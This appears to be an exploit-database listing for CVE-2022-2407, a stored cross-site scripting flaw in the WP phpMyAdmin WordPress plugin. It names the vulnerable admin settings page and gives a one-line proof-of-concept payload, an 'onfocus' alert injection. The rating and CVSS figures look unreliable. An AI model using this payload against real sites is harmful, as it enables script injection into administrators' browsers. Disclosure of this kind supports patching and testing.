Exploit for WP phpMyAdmin < 5.2.0.4 - Admin+ Stored Cross-Site Scripting CVE-2022-2407

Name: Exploit for WP phpMyAdmin < 5.2.0.4 - Admin+ Stored Cross-Site Scripting CVE-2022-2407
Rating: 5 (94 reviews)

2022-08-01 | CVSS 0.5

## https://sploitus.com/exploit?id=WPEX-ID:5BE611E8-5B7A-4579-9757-45A4C94A53CA
Put the following payload in the "phpMyAdmin on hosting" settings (/wp-admin/admin.php?page=wp-phpmyadmin-extension) of the plugin: "autofocus onfocus=alert(/XSS/)//